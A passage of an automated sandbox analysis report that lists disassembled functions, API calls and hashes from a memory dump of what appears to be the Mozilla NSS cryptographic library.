                                                                                                                                                                                                                                                      • Opcode ID: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                                                      • Instruction ID: 0ead000c01a93c8b4b947bcab1bea45ccdaaf1f3bf4255ba57cf3543ef1b12b1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701B1726016209FE620DB25DC45E2773B8DF86A09B0544ADE909D3B42E7A1FC158AE5
                                                                                                                                                                                                                                                      Function 6C51AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC2D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC44
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC59
                                                                                                                                                                                                                                                      • free.MOZGLUE(8CB6FF01,6C4F6AC6,?,?,?,?,?,?,?,?,?,?,6C505D40,00000000,?,6C50AAD4), ref: 6C51AC62
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                      • String ID: @]Pl
                                                                                                                                                                                                                                                      • API String ID: 1595327144-545999589
                                                                                                                                                                                                                                                      • Opcode ID: 607fc93a073c8b1a229d17cb059adc61af64a3d440183de1b20d4f673ba32882
                                                                                                                                                                                                                                                      • Instruction ID: e01bb93db8b1dcff674fff8bbf7437bac68254876088701b93ec4e112c36d0da
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 607fc93a073c8b1a229d17cb059adc61af64a3d440183de1b20d4f673ba32882
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C0178B56002009BEB01CF15ECC4F46B7A8AF54B1CF188068E8098FB06E731E808CBA2
                                                                                                                                                                                                                                                      Function 6C409C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C409CF2
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C409D45
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C409D8B
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C409DDE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                                                      • Opcode ID: 93b8601a29ec69275c2d5dedb3d8e3466c8fa2b5a872d19b48541dac1d5b805c
                                                                                                                                                                                                                                                      • Instruction ID: d14e7a5c182a7bfb7483a0cbfa786dbefc4cdfead7afb9fec6b7db1fa59d2644
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93b8601a29ec69275c2d5dedb3d8e3466c8fa2b5a872d19b48541dac1d5b805c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DA19071B846008BEB08EF64DC89F7A3775BF52316F19013DD4164BB40DB3AA946CB8A
                                                                                                                                                                                                                                                      Function 6C491E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C491ECC
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C491EDF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C491EEF
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C491F37
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C491F44
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3539092540-0
                                                                                                                                                                                                                                                      • Opcode ID: 999c711e5f7b85a5df38c5916499dfa52b84e79e4243495c77f7ac4398bc7d39
                                                                                                                                                                                                                                                      • Instruction ID: c05e9eedb646e5f44062af1232e100f7daa30b08368bf1477ec6294c88d06476
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 999c711e5f7b85a5df38c5916499dfa52b84e79e4243495c77f7ac4398bc7d39
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3471AC76A047119FD700CF24D840E5ABBF5FF88358F144929E89A93B21E731F959CB92
                                                                                                                                                                                                                                                      Function 6C51DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DE1B
                                                                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C51DE77
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2700453212-0
                                                                                                                                                                                                                                                      • Opcode ID: d6f5a230f82eab165e02f713dda35fd80ac3603963d6e210637e0f7ac8ad456f
                                                                                                                                                                                                                                                      • Instruction ID: 107bba80868dd3a6f07b6afedddcd133c3c5198c6288bb9688413620d7c99b31
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6f5a230f82eab165e02f713dda35fd80ac3603963d6e210637e0f7ac8ad456f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47716771A08314CFEB10CF99C9C869AB7B4FF89718F25816DD9596BB02D770A941CF80
                                                                                                                                                                                                                                                      Function 6C48DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFDA
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFF3
                                                                                                                                                                                                                                                      • PK11_IsFriendly.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E029
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3 ref: 6C48E046
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E149
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4224391822-0
                                                                                                                                                                                                                                                      • Opcode ID: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
                                                                                                                                                                                                                                                      • Instruction ID: e1869026af028a5878eb97a2e19af32a448678c643758ebec02bd3d2e935a0b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3513378602611CBDB10DF29C484F6ABBF1AF85309F19896CD9998BB41D731E884CBC2
                                                                                                                                                                                                                                                      Function 6C49BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C49BF06
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49BF56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C479F71,?,?,00000000), ref: 6C49BF7F
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49BFA9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C49C014
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3689625208-0
                                                                                                                                                                                                                                                      • Opcode ID: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
                                                                                                                                                                                                                                                      • Instruction ID: f6500dc44803987a25ea61dc1f1b1107328e37baef31a1bb060311911bf09f16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1741E975B012119BEB10DE65CC80FBA7BB9AF45209F114128ED1AD7B45FB31D905CBE1
                                                                                                                                                                                                                                                      Function 6C46EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C46EDFD
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000), ref: 6C46EE64
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C46EECC
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C46EEEB
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C46EEF6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3833505462-0
                                                                                                                                                                                                                                                      • Opcode ID: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
                                                                                                                                                                                                                                                      • Instruction ID: 1769c739fabcabf9237554b4ccb8e46445cd88f911ffd4e05541cdc027d2466b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C83134B1A006009BEB20DF2ACC84F667BF4FB46306F050629E95A87F54E731E815CBD9
                                                                                                                                                                                                                                                      Function 6C481F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C481F1C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C599EBC), ref: 6C481FB8
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(6C599E9C,?,?,6C599E9C), ref: 6C48200A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C482020
                                                                                                                                                                                                                                                        • Part of subcall function 6C476A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C47AD50,?,?), ref: 6C476A98
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C482030
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1390266749-0
                                                                                                                                                                                                                                                      • Opcode ID: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
                                                                                                                                                                                                                                                      • Instruction ID: 5b94228ea7dfd8f95bfcff3d543af35f26d41ceffa2ba222fa40132b4c6fd94e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98219375902506ABEB11DA15DC40FEA7778FF42219F140225ED3996F90EB32E528C7E2
                                                                                                                                                                                                                                                      Function 6C471DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E0B
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E24
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C471E3B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471E8A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471EAD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
